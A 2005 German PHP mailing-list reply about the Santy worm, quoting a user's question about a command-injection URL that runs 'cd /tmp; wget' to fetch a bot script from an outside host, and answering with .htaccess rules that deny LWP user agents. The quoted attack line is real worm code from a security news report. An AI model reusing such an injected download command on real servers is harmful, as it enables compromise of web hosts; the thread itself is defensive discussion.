[php] [OT] Santy: Wurm attackiert PHP-Skripte

Wolfgang Drews drews at dynamicwebpages.de
Mit Mar 9 11:07:47 CET 2005

krass.

Der war um weihnachten im Umlauf, und jetzt merkst du es???

>        Der grund für die wochenlangen Probleme auf meiner
>        Website ist anscheinend der Wurm "Santy". Meine
>        Website bzw. mein gemieteter Server ist seit Wochen
>        extrem überlastet und langsam.
>        Artikel:
>        http://www.heise.de/newsticker/result.xhtml?url=/newsti
>        cker/meldung/54623&words=Wurm%20attackiert%20PHP%20Skripte
>
>        Darin kommt dieser code vor:
>
>        http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;\
>        wget www.visualcoders.net/spybot.txt;
>
>        .. Nur versteh ich nicht ganz was der macht bzw wie
>        der da was böses machen kann...
> [...]

hier, hau sowas in die .htaccess rein, dann sollte es gut sein:
SetEnvIfNoCase User-Agent "^LWP::Simple" bad_bot
SetEnvIfNoCase User-Agent "^lwp-trivial" bad_bot
SetEnvIfNoCase User-Agent "^lwp" bad_bot
SetEnvIfNoCase User-Agent "^LWP" bad_bot

<Limit GET POST>
Order Allow,Deny
Allow from all
Deny from env=bad_bot